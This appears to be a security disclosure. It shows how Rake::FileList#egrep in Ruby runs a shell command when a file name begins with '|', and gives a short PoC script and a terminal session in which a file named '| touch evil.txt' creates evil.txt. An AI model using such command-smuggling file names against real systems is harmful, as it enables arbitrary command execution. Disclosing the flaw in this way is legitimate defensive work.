When a file which has command file name of stating with |
is in Rake::FileList
, then egrep
will execute the command.
PoC (poc_rake.rb
) is the following.
require 'rake'
list = Rake::FileList.new(Dir.glob('*'))
p list
list.egrep(/something/)
Example of executing.
% ls -1
Gemfile
Gemfile.lock
poc_rake.rb
vendor
| touch evil.txt
% bundle exec ruby poc_rake.rb
["poc_rake.rb", "Gemfile", "Gemfile.lock", "| touch evil.txt", "vendor"]
poc_rake.rb:6:list.egrep(/something/)
Error while processing 'vendor': Is a directory @ io_fillbuf - fd:7 vendor
% ls -1
Gemfile
Gemfile.lock
evil.txt
poc_rake.rb
vendor
| touch evil.txt
evil.txt
was created.
An attacker must deploy a file containing command names in the target environment, assuming that this attack is successful. If that would be a serious problem.